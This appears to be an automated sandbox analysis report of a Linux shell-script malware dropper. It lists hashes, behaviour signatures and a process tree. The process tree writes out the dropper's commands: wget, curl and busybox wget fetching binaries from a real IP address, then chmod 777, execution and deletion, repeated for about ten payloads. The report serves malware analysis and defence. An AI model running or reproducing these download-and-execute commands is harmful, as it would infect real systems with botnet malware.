Analysis
-
max time kernel
12s -
max time network
13s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19/10/2024, 01:51
Static task
static1
Behavioral task
behavioral1
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
-
Size
10KB
-
MD5
6a9652c294e5e9472ed245126df7a12a
-
SHA1
6b6211e9cda29897067be245039e7aec7b482f0e
-
SHA256
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7
-
SHA512
ebcee321431404cd9392dfec9d38e04b4cfc838bcb99512498730ea32d583d7690bcf26b0717df741102327d4f6330ca8730f3e433fd34db2250e20884c3db99
-
SSDEEP
192:2k07BhIIeyXF6IyR00QN+m0EX4q2Mk03BhISeyXF6I6i0QN+mlw:2k0BeyXoIyRlC4q2Mk0heyXoI6X
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 700 chmod 740 chmod 800 chmod 768 chmod 788 chmod 794 chmod 671 chmod 679 chmod 721 chmod 749 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi 672 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS 681 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb 702 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz 722 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm 741 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ 750 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V 770 FhITldMHonjpiCltv4sk55YKSWt040cZ3V /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN 789 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I 795 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK 801 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V curl File opened for modification /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I curl File opened for modification /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi curl File opened for modification /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS curl File opened for modification /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb curl File opened for modification /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz curl File opened for modification /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm curl File opened for modification /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ curl File opened for modification /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK curl File opened for modification /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN curl
Processes
-
/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh1⤵PID:638
-
/bin/rm/bin/rm bins.sh2⤵PID:640
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:660
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:669
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:671
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:672
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:673
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:674
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:676
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:681
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:682
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:684
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:695
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:704
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:715
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:722
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:738
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:745
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:764
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:784
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:793
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:799
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:803
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97